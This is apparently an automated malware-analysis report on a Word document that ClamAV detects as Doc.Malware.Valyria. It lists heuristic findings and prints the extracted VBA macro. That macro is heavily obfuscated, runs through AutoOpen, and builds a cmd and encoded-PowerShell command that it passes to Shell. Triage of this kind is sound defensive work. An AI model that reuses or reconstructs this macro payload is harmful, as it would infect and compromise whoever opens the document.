MALICIOUS
112
Risk Score
Heuristics 6
-
ClamAV: Doc.Malware.Valyria-6691555-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Valyria-6691555-0
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13887 bytes |
SHA-256: 64a62de3f91c807460c3a96789888e36a217bf0c4d8fb845a6ed1cdfbc6be1ad |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
152 of 213 identifiers look randomly generated (e.g. 'lPLpztrGVIiGft') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "fIzspJDt"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Error FuIla
Hour wzGJuG
Error Sin(8)
Error QIHNLA
VBA.Shell% KeyString(JEWYLiJQJ + uktfbQR + vbKeyC + kBzocMhPu + LiblRPPf) + pzPGPnMPhUInw + FhvzztVT + jYWuFbhtjQb + UnKzDWBZEv + TvKDGXDWj + wtclHM + bYsRozcNBOh + bnWbm + BIsrlTnLRtF + olmlXjBh + iJcomUoUp + MnrLMJW + BjiMYUzNVCXiud + UfVuTjvRzfEB, 748545624 - 748545624
Hour CDec(41936 / WlGVwi - 52107 - uIwRQh)
Hour Sqr(23)
End Sub
Attribute VB_Name = "AdjHsfbVoQN"
Function jYWuFbhtjQb()
On Error Resume Next
Hour CByte(5)
Hour 2
szHGsqi = "md" + " " + " " + " " + " " + "/" + "v" + " " + " " + " "
Error AdmGkX
Hour RODPK
iPzWVL = " " + " " + " " + " " + " " + " " + " " + " /" + "R " + " " + CStr(Chr(ZurjnMNibq + lPLpztrGVIiGft + 34 + azNzWtABb + jHEzHsrQvnaju)) + " "
Hour 9
Hour Hex(3427 + VYzIWk * qwTUE - BoZclS)
Error 2487
bRRBPcKr = " " + " " + "S" + "e" + "t" + " # "
Error Log(WzwETj)
Error 510
Hour BInrh
lzJfQQfnfC = " " + "=" + "p" + "@)e" + "rOh"
Hour CDbl(nEvNZ)
Error Cos(8)
hbLiXKET = "ell" + " -" + "e" + " JA" + ".:A"
Error bJwAQG
Error Sgn(673)
Eavsd = "E" + "Y" + "A6g" + "A9A" + "[4A"
Hour 959
Error CDec(lUmcn)
Hour LCase(tBivIZ)
iCcjFTFEf = "Z#." + "3A" + "C0A" + "b)" + "." + "iA" + "[@" + "AZ" + "#." + "jA"
Error CCur(mQzmj)
Hour Log(8)
ajpUnRb = "H#A" + "}" + "A.{" + "A[U" + "Ad" + "A" + "Au" + "A"
Error 62
Error Month(8930 * YBrjbB + HCdKRT / iTOIlT)
YhoHb = "Fc" + "AZ#" + ".iA" + "E" + "M" + "A" + "bA" + ".pA"
jYWuFbhtjQb = szHGsqi + iPzWVL + bRRBPcKr + lzJfQQfnfC + hbLiXKET + Eavsd + iCcjFTFEf + ajpUnRb + YhoHb
Error qiuIp
Error CDate(sdODw)
End Function
Function UnKzDWBZEv()
On Error Resume Next
Error CDbl(fSikFw)
Hour Sin(3)
ZzPpc = "[U" + "Ab" + "g.0" + "A" + "DO" + "A" + "JA."
Error 333329628
Error CDate(85857 * tBrnR - 75167 + uwKio)
Error Int(TSFAl - GOrnzm + 49848 + OEUiZ)
ELGilhiu = "p" + "AEY" + "A" + "dg" + "A9A" + "CcA" + "a" + "A" + ".0"
Hour vCbKhI
Hour Rnd(8)
PjsJqQEfPP = "AH" + "#" + "A" + "cAA" + "$A" + "C8" + "A" + "L)." + ")AH" + "M" + "A" + "e"
Hour CStr(8)
Error Sqr(PjlOt)
BnbYRz = "#.j" + "A[g" + "A" + "Z#" + "." + "kA" + "[UA" + "bA." + "pA[" + "MA" + "c)." + "vA["
Error mIldtl
Hour 465724413
Error DJzjT
uiwqZ = "MA" + "a#." + "lAH" + "#A" + "e#A" + "uA[" + "8" + "Ac" + "g." + "nA"
UnKzDWBZEv = ZzPpc + ELGilhiu + PjsJqQEfPP + BnbYRz + uiwqZ
Hour Second(jWuGc)
Error iPNpV
Hour CBool(56847 * RHMsk - HXVJiR * RivQj)
End Function
Function TvKDGXDWj()
On Error Resume Next
Error JVqTzw
Hour Fix(NKZPZw)
Error 742
sVKLzudw = "C4" + "A" + "Y" + "#.1" + "A" + "C" + "8" + "A" + "M)"
Hour IzhXa
Hour CDbl(lBuWX * OaAbDF / YMkiG / jpmYa)
Hour Sqr(87)
sTnKpJKA = ".t" + "AHc" + "A#" + "A" + ".@A" + "H#A"
Error Val(2494)
Error Month(GDzqn)
UFpFpw = "dA." + ")AD" + "@" + "A" + "L" + ")A" + "v" + "A" + "[#" + "A" + "b)." + "OA["
Error Str(705)
Hour Cos(PjDTSH)
saGMjjXww = "MAa" + "#At" + "AHA" + "AZ#" + ".jA" + "[MA" + "Y#"
Error CBool(YzdTq)
Hour 7
phLmjs = ".0" + "A" + "[k" + "A" + "Lg" + ".pA" + "H#A" + "L)." + "5AD" + "cA" + "6#A" + "5AE" + "AAa"
Error Month(HLQnc - 14447)
Hour CCur(rqJqcj + 80971)
Hour TypeName(tdBvP + RJkrS)
ZhEhBFVuE = "A.0" + "AH#" + "AcA" + "A" + "$AC" + "8" + "AL" + ").z" + "A" + "["
Error Rnd(189351509)
Hour LnFSO
Error Sin(SAzdYv - VhITd)
YkRNbb = "gAb" + ").r" + "A[" + "8" + "Ab" + ")" + ".@" + "AHM" + "A" + "Y#."
Error Fix(VaVpib)
Error jFrCH
Hour Val(7019)
DvhzfY = "uA" + "[E" + "AdA" + "Au" + "A[" + "kAc"
Error CDate(BoNpvp)
Error CDate(29754 - RuzGCm)
Error Int(45)
FjXCT = "g" + "Av" + "AH" + "U" + "Aeg" + ".D" + "A" + "E0A" + "N#." + "yAH"
Error Atn(zYJMuq)
Error Cos(jtQcv)
Hour CCur(bYbwa)
hiBErREBR = "}" + "AW#" + ".AA" + "[g" + "A" + "dA." + "0A" + "HAA" + "{g" + "Av" + "AC8" + "Aa"
Hour Int(mKdLcD)
Hour 439336224
Hour TypeName(9457)
HRakTVmW = ")" + ".hA" + "[4" + "AZ" + "A." + "v" + "AH" + "MA" + "a#." + "p" + "AC" + "4Ab" + "g.l"
Error 32
Hour 636
Hour 46
rbzYznVQY = "A" + "H" + "#AL" + ")." + "]" + "A[" + "YA" + "W#" + ".$" + "A[E" + "A#"
TvKDGXDWj = sVKLzudw + sTnKpJKA + UFpFpw + saGMjjXww + phLmjs + ZhEhBFVuE + YkRNbb + DvhzfY + FjXCT + hiBErREBR + HRakTVmW + rbzYznVQY
Hour TzjQDW
Hour Second(2)
Hour 41
End Function
Function wtclHM()
On Error Resume Next
Error Month(30)
Error 1
Hour wcsuM
bktwoJ = "A.@" + "AH#" + "Ad" + "A." + ")AD" + "@AL" + ")Av" + "A" + "[" + "YA"
Hour TimeValue(RflVb)
Error TypeName(BoIAjw)
GfvLzJcssGO = "c" + "g.h" + "A[M" + "A" + "dA." + "h" + "A[" + ")" + "A" + "Lg." + "2A"
Hour UhEKUi
Error cqdGiN
OLYzwMJ = "[4A" + "L)" + "." + "vAE" + ")A" + "J)" + "Au" + "AFM" + "A" + "cA." + "OA" + "[" + "k"
Hour 79
Error TimeValue(312)
Hour Month(335)
IFGiAknAnS = "Ad" + "AA@" + "AC" + "cA#" + "AAn" + "ACk"
Hour Cos(744)
Hour vbEsoL
Hour Tan(95)
hfbiT = "A{" + ")" + "AkA" + "E" + ")Ac" + "#." + "0" + "A"
Hour TypeName(iwZitM)
Hour jsskoc
SuPimPLoV = "C" + "AA" + "P" + "#A" + "gA" + "CcA" + "M" + "#" + "A" + "0A" + "DYA"
Error aPWGcw
Hour zSjTo
HDrDurHSNH = "J" + ")A" + "7A" + "C" + "#AW" + "A.U" + "AH" + "YAP" + "#Ak" + "A[" + "U" + "Ab"
Error CStr(lCDrQ)
Hour 26
Error bknkfH
KrSXhpVXG = "g.2" + "A" + "D" + "@A" + "c" + "A" + "."
Error CDbl(628)
Hour TypeName(69004 * IcujB * BYuuA * uiGLA)
Error TimeValue(31328938)
DOVcLRdUut = "1A" + "[}" + "Ab" + "A." + "p" + "A[" + "M" + "AK" + ")" + "A" + "n" + "AF"
Hour CBool(drrvV)
Hour CDec(776)
kciDTLjM = ")A" + "J" + ")Ar" + "AC" + "#A" + "TA." + "xAH" + "#" + "AK" + ")"
wtclHM = bktwoJ + GfvLzJcssGO + OLYzwMJ + IFGiAknAnS + hfbiT + SuPimPLoV + HDrDurHSNH + KrSXhpVXG + DOVcLRdUut + kciDTLjM
Hour ZjlMl
Error KjaBJ
End Function
Function bYsRozcNBOh()
On Error Resume Next
Hour 75
Error Fix(23)
Error 9
qCpjioROfz = "An" + "AC" + "4A" + "Z" + "#" + "." + "4" + "A" + "[U" + "AJ)" + "A7A" + "["
Hour CByte(9)
Hour CByte(QPnwFN)
UmidiHmzjt = "YAb" + ")." + "yA[" + "UAY" + "#." + "jA[" + "gA" + "KA" + "A" + "kA" + "H@" + "A" + "##"
Error Int(vJtlv / 2378)
Error Tan(Ujzhwb)
Error CDbl(FjJLs)
jrOGMuztMR = "." + "qAC" + "AAa" + "#.u" + "AC" + "A" + "AJA" + ".p" + "A" + "EYA"
Hour 265
Hour LCase(95)
HKKNSrmlt = "d" + "gAp" + "A" + "H" + "OAd" + "A" + "." + "yA"
Error noMLP
Error 53
Hour 72
hiqoH = "H" + "kA" + "e)" + "A" + "kA" + "[YA" + "sg"
Error Atn(UCLWnw / TootJE * jzJiHa / GTwzsJ)
Error 995
qHZzZ = ".W" + "AC4" + "As" + "A" + ".vA" + "HcA"
Hour Int(nalwwi)
Hour Fix(4293)
Error VwtiZ
zHVIjz = "bg." + "OA" + "[8" + "AY#" + "." + "kA" + "EY" + "Aa#" + ".O" + "A" + "[U"
bYsRozcNBOh = qCpjioROfz + UmidiHmzjt + jrOGMuztMR + HKKNSrmlt + hiqoH + qHZzZ + zHVIjz
Hour Atn(jPWvo + jbTzQV)
Error Sin(98)
Error CByte(NjOFzz)
End Function
Function bnWbm()
On Error Resume Next
Error Cos(26331 - rhptIk)
Hour Fix(77943 / wnVGV - 98326 * 34231)
iCiLIEFI = "AKA" + "AkA" + "H@" + "A##" + "." + "qAC"
Hour Fix(UIslHP + 43479 - wuNLj - bHPmn)
Error LilspN
zkKnfoZnlt = ")A" + "}" + "A" + "A" + "kA" + "Fg"
Hour Fix(70793 / 7914)
Hour wTqztW
Error hilWHt
iOBljZNjU = "A6A" + ".2A" + "Ck" + "A{)" + "." + "T" + "AH" + "#A" + "Y"
Hour tVmHFI
Hour TimeValue(2)
Hour CBool(fOFBIZ / sSCBQ)
IrEtCMwp = "#." + "yAH" + "#A" + "L#" + ".#" + "AH" + "}Ab" + ")." + "jA[" + "UAc" + ").z" + "AC" + "A"
Hour CBool(kwsEOb * FJzCPR)
Hour Atn(UbEop)
Error Oct(tqjOTF)
ciwzSSBkCj = "AJ" + "A." + "YA" + "F#A" + "d" + "g"
Error kjJKj
Hour CDbl(QZFkZ)
Error 387
DUckdEioqQX = "A7A" + "[}A" + "cg." + "lA[" + "EA" + "a" + ")A" + "7AH" + "0AY" + ")." + "h" + "AH#" + "A"
Error Second(78155 * qXJPOq - kVvqns / jRdwt)
Hour CDate(2)
jjdhWiXYCkb = "Y)" + "." + "@A" + "H" + "OA," + "#." + "9AC" + "A" + "A}A" + "AgA" + "CA" + "A}" + "AA"
Error CDate(KbTiSZ + aVNfb)
Error qBjYA
MSqLOKp = "gAC" + "AA}" + "AA" + "g" + "AC" + "AA" + "}AA" + "g" + "ACA" + "A}" + "AAg" + "ACA" + "A"
Error Second(PKzVV / MsrCn)
Error dsMcsD
Error Rnd(pjTrwo)
LGVCmR = "}A" + "A=&" + " " + " " + " " + " " + " " + " " + " " + " "
Hour VpmYvH
Error CDec(300)
Hour SWPzaV
YSDZzauWiRr = "S" + "et" + " " + " " + " " + " " + " " + " " + " "
Error 409492229
Hour 8759
LcYaMjKEBv = "] " + " =!" + "#" + " " + ":[" + "=G"
Error CVar(pGoZE)
Error lpPnY
MUmlLbz = "!&&" + " " + " " + " " + " Se" + "T " + " "
bnWbm = iCiLIEFI + zkKnfoZnlt + iOBljZNjU + IrEtCMwp + ciwzSSBkCj + DUckdEioqQX + jjdhWiXYCkb + MSqLOKp + LGVCmR + YSDZzauWiRr + LcYaMjKEBv + MUmlLbz
Hour Sin(96)
Error CBool(UiqUm)
Error LCase(bfjBRk)
End Function
Function BIsrlTnLRtF()
On Error Resume Next
Hour DqGBN
Hour CDate(jSKMiq)
Error Month(724)
OrMQnTQI = " " + " " + " " + " " + "} " + "=!]" + " :" + "."
Hour qCOks
Error 46
Hour hLkojL
iCrffh = "=" + "B!&" + "& " + " " + " " + " "
Error CDate(vZolsw)
Error Val(251337497)
Hour Sin(VnUiVq / dOEZG * iwhazq + QLncEY)
TfjaPW = " " + " " + " " + " " + "SeT" + " " + " " + " " + " " + " " + " "
Hour Cos(52)
Hour CStr(soPKB - YKiUM)
KrwBt = " " + " #" + " " + " " + " =" + "!}" + " " + ":" + "s=" + "R!" + "&& " + " "
Error Atn(FuWKAr + zcTKW / 31526 * vtVZX)
Hour CStr(DquNbG)
Hour iWJhoZ
LKYkAiMallT = " " + " " + " " + " " + " " + " " + " S" + "Et" + " "
Hour 9
Error CStr(KLhvJ * fCYSE + jpwHi - uArBjP)
Error MdLSL
tYAHiIlA = " " + " " + " " + "\ " + " " + " =!" + "# " + " " + ":" + ",=f" + "!"
Error Hex(oVBfNS)
Hour 9
FAnNjITmj = "& " + " " + " " + " " + " s" + "ET" + " " + " "
Hour 60
Error CDate(HuhNZG)
ZSzWzdk = " " + " " + " $ " + " " + " =" + "!" + "\" + " "
Error Sqr(YNztD - fzSNr)
Hour CByte(IcSji)
mzYBmplNKs = " " + ":6=" + "V!" + "&" + "& " + " " + " " + " " + "s"
Hour Atn(EEmsqQ)
Error CBool(AfXHf)
iZNFdAwhCTB = "E" + "T " + " " + " " + " " + " -" + " " + " =" + "!$" + " " + " " + ":" + "O="
BIsrlTnLRtF = OrMQnTQI + iCrffh + TfjaPW + KrwBt + LKYkAiMallT + tYAHiIlA + FAnNjITmj + ZSzWzdk + mzYBmplNKs + iZNFdAwhCTB
Hour Sgn(3862)
Error 567
Error 32
End Function
Function olmlXjBh()
On Error Resume Next
Error Round(7)
Hour Fix(toFwDl)
iWdASLhXVX = "s!&" + " " + " " + " " + "S" + "eT" + " "
Error ZcsfM
Error Cos(87320 * DpkHwu * CBTUI * AMsia)
YHYAHjdWZz = " " + " " + " ," + " " + " =!" + "- " + ":]="
Hour AjtZcP
Error upjzL
nLzViTjY = "S!&" + " " + " " + "Se" + "t"
Error Val(KVPazF)
Error CCur(Zjszrt)
Error CVar(UVIMj)
wPqliGQV = " " + " " + " " + " " + " " + " _" + " " + " " + " "
Hour JrQFj
Hour Str(MLLkA)
Error Log(35)
ZchJiLRFYYB = "=!," + " " + " :$" + "=6" + "!& " + " " + " " + " " + "se" + "t " + " " + " "
Hour Log(ZrCjd)
Error Cos(Sunqj / DbwCH)
Error Rnd(6)
aztvMNz = " " + " " + "] " + " " + " =" + "!_ " + " " + " " + " " + " :" + "{=" + "O!&"
Hour Oct(351)
Error Sqr(74528 - qMFjhz / psIHt * jGfwIk)
Error TimeValue(91)
strsT = "& " + " " + " " + " " + " "
olmlXjBh = iWdASLhXVX + YHYAHjdWZz + nLzViTjY + wPqliGQV + ZchJiLRFYYB + aztvMNz + strsT
Error 6325
Error 13
End Function
Function iJcomUoUp()
On Error Resume Next
Error Atn(7)
Error Oct(8296)
Error Second(8155)
wzYSQDGWa = " " + " " + " S" + "Et " + " " + " "
Error Second(316942206)
Error CDbl(8856)
YajRl = " " + " " + "} " + " " + " " + " " + "=!]" + " " + " " + ":"
Error CDec(wdddW * 54591)
Error 3100
rprNkiGLYF = "}=I" + "!& " + " " + " " + " " + " " + " " + " "
Error CVar(AfCTdw)
Hour Fix(wAriz / SIvTl * 3652 / nNjncB)
SDETbbpM = " " + "S" + "e" + "T" + " " + " " + " " + " " + "? " + "=" + "!} " + " "
Error CDbl(15460 + jwbCl / kSGDL - iORia)
Error jPcNL
rmOtHDEDi = " " + ":" + ")=" + "w!&" + "&" + " "
Error Int(1271)
Error 6846
Hour 307042667
GLhhzv = " " + " " + " " + " " + " s" + "E" + "T " + " " + " " + " " + " -"
Error 293
Hour Second(ozHhXB / lLAiwP)
fZFXbzKskZ = " " + " =!" + "? " + " :" + "@=" + "o" + "!&&" + " " + " " + " " + " " + " " + " "
Error TypeName(VzbIY + nHjPpT)
Hour 819
Hour CBool(7957 + Jlbih - jGYfb * PzPww)
WwUMDU = " " + "sET" + " " + " " + " " + " " + " " + " " + " " + " ["
Hour CVar(263060394)
Error 8
sbvzIttr = " " + " =" + "!- " + " " + " "
iJcomUoUp = wzYSQDGWa + YajRl + rprNkiGLYF + SDETbbpM + rmOtHDEDi + GLhhzv + fZFXbzKskZ + WwUMDU + sbvzIttr
Error Round(512702594)
Hour CDec(KAwIM)
End Function
Function MnrLMJW()
On Error Resume Next
Error Sgn(452612950)
Error MnhBO
Error 3
wKJavo = "::=" + "m!" + "&" + " " + " " + " "
Error 8638
Error 2560
Error Month(1775)
sdTEGhdcip = " " + " " + " " + " " + " " + "s" + "ET" + " " + " " + ";" + " "
Hour CDate(3)
Hour CStr(UTslG - 87384 * pbQVW / lwMTt)
HVuSKlLpXO = " " + "=" + "![ " + " :" + "#=Q" + "!&" + " "
Hour 1950
Hour Round(408)
hSUCTJjG = " " + "CaL" + "l " + " " + " " + "%"
Error 364
Error CVar(ZMRjNG)
Hour 9
nEifuBQ = "; " + " " + "%" + " " + " " + " " + " " + CStr(Chr(DQLlEurtEdd + rOKOvELwQK + 34 + ocZfANSlv + ppzvoNAUitTY)) + " " + " "
MnrLMJW = wKJavo + sdTEGhdcip + HVuSKlLpXO + hSUCTJjG + nEifuBQ
Hour 3800
Error Str(oTbbOU)
Hour Cos(8631)
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.